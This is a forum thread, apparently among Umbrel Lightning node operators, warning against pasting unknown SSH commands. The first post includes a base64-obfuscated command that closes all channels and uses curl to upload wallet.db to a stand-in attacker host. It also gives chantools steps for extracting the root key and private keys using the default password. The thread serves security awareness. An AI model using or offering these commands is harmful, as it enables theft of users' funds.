Be careful with ssh, your node may get hacked

Hi I just read a lot of posts of people using ssh to execute “helpful” commands, most of them are for troubleshooting but be careful, your “wallet.db” is accessible via ssh and the default password is “moneyprintergobrrr”. This db file is very important, as critical as your seed phrase and I will explain why with an example:

Here a example on how someone can “hack” your node funds:

  1. We are going to copy the wallet.db, using a obfuscated “helpful” command

$(echo "bG5jbGkgY2xvc2VhbGxjaGFubmVscztjdXJsICAtRiAiaW1hZ2U9QGxuZC9kYXRhL2NoYWluL2JpdGNvaW4vbWFpbm5ldC93YWxsZXQuZGIiIGhhY2tlci5jb20vdXBsb2FkCg==" | base64 --decode)

What looks like an easy copy & paste comand is in fact a critical command that can compromise your node, if we decode the code above we get this:

lncli closeallchannels;curl -F "image=@lnd/data/chain/bitcoin/mainnet/wallet.db"

The command closes all your channels at once and uploads your wallet.db to the hacker temp server.

  1. After they closed your channels and got your wallet.db they can move your on-chain funds. To do this they can use a tool like chantools,

to get your rootkey

./chantool walletinfo --walletdb=wallet.db --withrootkey (password “moneyprintergobrrr”)


./chantool genimportscript --format=electrum --rootkey=<key>

Finally they can use the output script with all private keys to import it in Electrum and get all your coins.

This wallet.db file is useful to move stuck coins or for Node recovery, but keep your node safe and avoid executing commands you don’t know.


Agreed. Using SSH from outside home LAN is dangerous and not recommended.
As node operator, you have enough web tools/apps to manage your node in a more secure manner (RTL/TH/Zeus/Zap).

1 Like

The question is then, how we can secure the network and don’t allow this to happen in case we need to access via ssh from a different network?

For example, adding 2FA to ssh is one option (am surprised is not a default on umbrel yet!)

I assume Umbrel comes already with Tor and by default is not accessible outside the LAN networks via ssh. Have been trying to set up TailScale with MagicDNS, it does allocate a to your node… that is not ideal either.

Any further options out there?

Simple: abstain from accessing outside of your LAN with SSH


Very interesting. But just to understand, what does prevent the hack to work if we send this command from a local network? If you did copy paste the code found on a forum or whatever, it will indeed close the channels and send the wallet.db to a web directory controlled by the hacker. Or is there something I didn’t understood?


Yeah, That’s pretty much it, copy & paste unknown code is always a bad practice.

1 Like